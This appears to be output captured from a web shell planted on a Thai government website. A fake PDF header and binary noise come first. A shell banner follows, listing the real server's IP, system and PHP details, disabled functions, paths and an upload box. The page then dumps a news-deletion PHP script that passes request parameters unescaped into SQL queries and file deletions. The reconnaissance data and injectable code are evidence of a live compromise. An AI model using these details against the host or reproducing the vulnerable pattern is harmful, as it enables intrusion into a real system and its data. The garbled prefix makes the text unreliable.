%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
| Server IP : 122.155.177.87 / Your IP : 122.155.177.87 Web Server : Apache/2 System : Linux cat177-87.static.lnwhostname.com 3.10.0-1160.62.1.el7.x86_64 #1 SMP Tue Apr 5 16:57:59 UTC 2022 x86_64 User : apache ( 994) PHP Version : 5.3.29 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname,putenv,eval MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/thungkhana/domains/thungkhanan.go.th/public_html/news/ |
Upload File : |
<?php
session_start();
if($_SESSION[user]==""){
session_destroy();
$message = "س Login .";
$url = "../admin/index.php";
include("../admin/alert.php");
exit;
}
require_once('../admin/Connections/conndb.php');
mysql_select_db($database_conndb, $conndb);
if (isset($_GET['cat_id'])) {
$cat_id=$_GET['cat_id'];
}
$query_rsNews = "SELECT * FROM news_detail where id = '$id'";
$rsNews = mysql_query($query_rsNews, $conndb) or die(mysql_error());
$row_rsNews = mysql_fetch_assoc($rsNews);
$totalRows_rsNews = mysql_num_rows($rsNews);
if($_GET[id]!=""){
$sql="SELECT * FROM news_detail_file WHERE id=".$_GET[id];
$res=mysql_query($sql,$conndb) or die(mysql_error());
while($f=mysql_fetch_object($res)){
if(file_exists("doc_download/".$f->path)){
unlink("doc_download/".$f->path);
}
}
$del2="delete from news_detail_file WHERE id=".$_GET[id];
mysql_query($del2,$conndb) or die(mysql_error());
}
?>
<?php
function GetSQLValueString($theValue, $theType, $theDefinedValue = "", $theNotDefinedValue = "")
{
$theValue = (!get_magic_quotes_gpc()) ? addslashes($theValue) : $theValue;
switch ($theType) {
case "text":
$theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL";
break;
case "long":
case "int":
$theValue = ($theValue != "") ? intval($theValue) : "NULL";
break;
case "double":
$theValue = ($theValue != "") ? "'" . doubleval($theValue) . "'" : "NULL";
break;
case "date":
$theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL";
break;
case "defined":
$theValue = ($theValue != "") ? $theDefinedValue : $theNotDefinedValue;
break;
}
return $theValue;
}
if ((isset($_GET['id'])) && ($_GET['id'] != "")) {
$deleteSQL = sprintf("DELETE FROM news_detail WHERE id=%s",
GetSQLValueString($_GET['id'], "int"));
// ลบไฟล์เอกสารู้
if($row_rsNews['filename']!=""){
$QFile=$row_rsNews['filename'];
echo $QFile;
$fileQFile="doc_download/$QFile";
if(file_exists("$fileQFile")) unlink("$fileQFile");
}
// ลบไฟล์ภาพ
if($row_rsNews['pic']!=""){
$QPic=$row_rsNews['pic'];
echo $QPic;
$fileQPic="photo/$QPic";
if(file_exists("$fileQPic")) unlink("$fileQPic");
}
mysql_select_db($database_conndb, $conndb);
$Result1 = mysql_query($deleteSQL, $conndb) or die(mysql_error());
// $deleteGoTo = "admin.php";
if (isset($_SERVER['QUERY_STRING'])) {
$deleteGoTo .= (strpos($deleteGoTo, '?')) ? "&" : "?";
$deleteGoTo .= $_SERVER['QUERY_STRING'];
}
// header(sprintf("Location: %s", $deleteGoTo));
echo "<meta http-equiv='refresh' content='0;URL=admin.php?cat_id=".$cat_id."'>";
}
if($conndb)
{
mysql_close($conndb);
unset($conndb);
}
?>